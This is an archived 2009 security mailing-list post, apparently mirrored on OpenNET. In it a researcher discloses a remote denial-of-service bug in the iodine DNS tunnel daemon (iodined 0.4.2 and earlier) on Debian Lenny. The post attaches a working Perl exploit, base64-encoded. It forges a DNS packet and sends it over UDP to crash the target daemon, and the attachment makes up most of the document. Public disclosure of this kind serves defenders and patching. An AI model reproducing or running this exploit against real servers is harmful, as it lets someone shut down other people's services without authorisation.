The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Remote iodinetd DoS vulnerability on Debian Lenny


<< Previous INDEX Search src / Print Next >>
Subject: Remote iodinetd DoS vulnerability on Debian Lenny
From: Albert =?ISO-8859-1?Q?Sellar=E8s?= <whats@wekk.net.>
To: [email protected]
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-ujJeCd5MaRWhUitj2S00"
Date: Sun, 26 Apr 2009 19:00:41 +0200
Message-Id: <1240765241.5975.42.camel@x61s.>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
X-Virus-Scanned: antivirus-gw at tyumen.ru


--=-ujJeCd5MaRWhUitj2S00
Content-Type: multipart/mixed; boundary="=-cmJNDz0z3iZG5KXWPRTt"


--=-cmJNDz0z3iZG5KXWPRTt
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Hi,

I attach an exploit that lets you shutdown a remote iodinet server
(version <=3D 0.4.2). This bug was found some weeks before on Debian
Lenny, but it hasn't been fixed in the stable branch and the bug has
been closed :S.

This is the Debian bug:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=3D521260

Greetings.

--=20
  Albert Sellar=C3=A8s        GPG id: 0x13053FFE
  http://www.wekk.net    [email protected]=20
  Linux User: 324456               =20

--=-cmJNDz0z3iZG5KXWPRTt
Content-Disposition: attachment; filename=shoot-iodined
Content-Type: application/x-perl; name=shoot-iodined
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9wZXJsCgojIGlvZGluZWQgPD0gMC40LjIgRG9TIGV4cGxvaXQKIwojIGJ5IEFs
YmVydCBTZWxsYXJlcyA8d2hhdHNbYXRdd2Vra1tkb3RdbmV0PiAKIyBodHRwOi8vd3d3Lndla2su
bmV0CiMgMjAwOS0wNC0yNgojCiMgVGhpcyBleHBsb2l0IHNodXRzIGRvd24gdGhlIGlvZGluZWQg
ZGFlbW9uIHVzaW5nIGEgZm9yZ2VkIEROUyBwYWNrZXQuCiMgSXQgd29ya3Mgb24gdGhlIGxhc3Qg
ZGViaWFuIHN0YWJsZSB2ZXJzaW9uICgwLjQuMi0yKS4KIwojIEl0IHByb2R1Y2VzIGEgc2VnbWVu
dGF0aW9uIGZhdWx0IG9uIHRoZSBkYWVtb24gc2lkZS4KCnVzZSBJTzo6U29ja2V0Owp1c2Ugc3Ry
aWN0OwoKbXkgJHBrdF9oZWFkZXIgPSAiXHgwMFx4MDFceDAxXHgwMFx4MDBceDAxXHgwMFx4MDBc
eDAwXHgwMFx4MDBceDAxXHgwYlx4NTZceDYzXHg2MVx4NjFceDYxXHg2OVx4NjFceDcxXHg2MVx4
NjFceDY0IjsKbXkgJHBrdF9mb290ZXIgPSAiXHgwMFx4MDBceDBhXHgwMFx4MDFceDAwXHgwMFx4
MjlceDEwXHgwMFx4MDBceDAwXHg4MFx4MDBceDAwXHgwMCI7CgppZiAoJCNBUkdWICE9IDEpIHsK
ICAgIHByaW50ICJzaG9vdC1pb2RpbmVkIDw9IDAuNC4yIC0gPHdoYXRzW1xAdF13ZWtrLm5ldD5c
biIuCiAgICAgICAgICAiPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09XG4iLgogICAgICAgICAgIlVzYWdlOiAuL3Nob290LWlvZGluZWQgaG9zdCBkb21haW5cbiIu
CiAgICAgICAgICAiICogaG9zdDogSG9zdCBhZGRyIHdoZXJlIGlvZGluZWQgaXMgbGlzdGVuaW5n
XG4iLgogICAgICAgICAgIiAqIGRvbWFpbjogRG9tYWluIHRoYXQgaW9kaW5lZCBpcyB1c2luZ1xu
IjsKICAgIGV4aXQgMTsKfQoKbXkgJGhvc3QgPSAkQVJHVlswXTsKbXkgJGRvbWFpbiA9ICRBUkdW
WzFdOwpteSAkdGVtcGxhdGUgPSAnYTI0JzsKbXkgQHBrdDs7Cm15ICRsOwoKcHVzaChAcGt0LCAk
cGt0X2hlYWRlcik7Cm15IEBjaHVuayA9IHNwbGl0KC9cLi8sICRkb21haW4pOwoKZm9yZWFjaCAo
QGNodW5rKSB7CiAgICAkbCA9IGxlbmd0aCAkXzsKICAgICR0ZW1wbGF0ZSA9ICR0ZW1wbGF0ZSAu
ICdDYScuICRsOwogICAgcHVzaChAcGt0LCAkbCk7CiAgICBwdXNoKEBwa3QsICRfKTsKfQokdGVt
cGxhdGUgPSAkdGVtcGxhdGUgLiAnYTE2JzsKcHVzaChAcGt0LCAkcGt0X2Zvb3Rlcik7CgokfCA9
IDE7CnByaW50ICIgWypdIFNob290aW5nIGlvZGluZWQgYXQgaG9zdCAkaG9zdC4uLlxuIjsKCm15
ICRzb2NrID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCAgUHJvdG8gICAgID0+ICd1ZHAnLAogICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBlZXJQb3J0ICA9PiA1MywKICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICBQZWVyQWRkciAgPT4gJGhvc3QpIG9yIGRpZSAiQ3Jl
YXRpbmcgc29ja2V0OiAkIVxuIjsKCiRzb2NrLT5zZW5kKHBhY2soJHRlbXBsYXRlLCBAcGt0KSkg
b3IgZGllICJzZW5kOiAkISI7CgpwcmludCAiIFsqXSBJZiB0aGUgZG9tYWluIHdhcyBvaywgbm93
IHRoZSBzZXJ2aWNlIGlzIGRvd24uXG4iOwo=


--=-cmJNDz0z3iZG5KXWPRTt--

--=-ujJeCd5MaRWhUitj2S00
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: =?ISO-8859-1?Q?Aix=F2?= =?ISO-8859-1?Q?_=E9s?= una part
        d'un missatge signada digitalment

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)

iEYEABECAAYFAkn0kzkACgkQK3eYPRMFP/5yhACglC7sVtD8Vtrv0M3cpYF0CRtK
a8wAni9uGdZo76D+7cw597OkS7IJs16u
=NLMc
-----END PGP SIGNATURE-----

--=-ujJeCd5MaRWhUitj2S00--



<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру